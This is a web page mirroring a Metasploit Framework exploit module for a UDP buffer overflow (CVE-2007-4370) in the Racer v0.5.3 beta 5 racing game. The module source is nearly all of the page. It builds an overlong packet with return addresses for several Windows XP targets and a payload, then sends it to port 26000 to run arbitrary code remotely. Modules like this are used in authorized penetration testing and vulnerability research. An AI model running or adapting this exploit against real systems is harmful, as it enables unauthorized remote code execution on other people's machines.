Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/games/racer_503beta5.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = GreatRanking
8
9
include Msf::Exploit::Remote::Udp
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'Racer v0.5.3 Beta 5 Buffer Overflow',
16
'Description' => %q{
17
This module exploits the Racer Car and Racing Simulator game
18
versions v0.5.3 beta 5 and earlier. Both the client and server listen
19
on UDP port 26000. By sending an overly long buffer we are able to
20
execute arbitrary code remotely.
21
},
22
'Author' => [ 'Trancek <trancek[at]yashira.org>' ],
23
'License' => MSF_LICENSE,
24
'References' => [
25
[ 'CVE', '2007-4370' ],
26
[ 'OSVDB', '39601' ],
27
[ 'EDB', '4283' ],
28
[ 'BID', '25297' ],
29
],
30
'Payload' => {
31
'Space' => 1000,
32
'BadChars' => "\x5c\x00",
33
'EncoderType' => Msf::Encoder::Type::AlphanumUpper,
34
},
35
'DefaultOptions' => {
36
'AllowWin32SEH' => true
37
},
38
'Platform' => 'win',
39
'Targets' => [
40
# Tested ok aushack 20090503
41
[ 'Fmodex.dll - Universal', { 'Ret' => 0x10073FB7 } ], # jmp esp
42
[ 'Win XP SP2 English', { 'Ret' => 0x77d8af0a } ],
43
[ 'Win XP SP2 Spanish', { 'Ret' => 0x7c951eed } ],
44
],
45
'DisclosureDate' => '2008-08-10',
46
'DefaultTarget' => 0,
47
'Notes' => {
48
'Reliability' => UNKNOWN_RELIABILITY,
49
'Stability' => UNKNOWN_STABILITY,
50
'SideEffects' => UNKNOWN_SIDE_EFFECTS
51
}
52
)
53
)
54
55
register_options(
56
[
57
Opt::RPORT(26000)
58
]
59
)
60
end
61
62
def exploit
63
connect_udp
64
65
buf = Rex::Text.rand_text_alphanumeric(1001)
66
buf << [target.ret].pack('V')
67
buf << payload.encoded
68
buf << Rex::Text.rand_text_alphanumeric(1196 - payload.encoded.length)
69
70
udp_sock.put(buf)
71
72
handler
73
disconnect_udp
74
end
75
end
76
77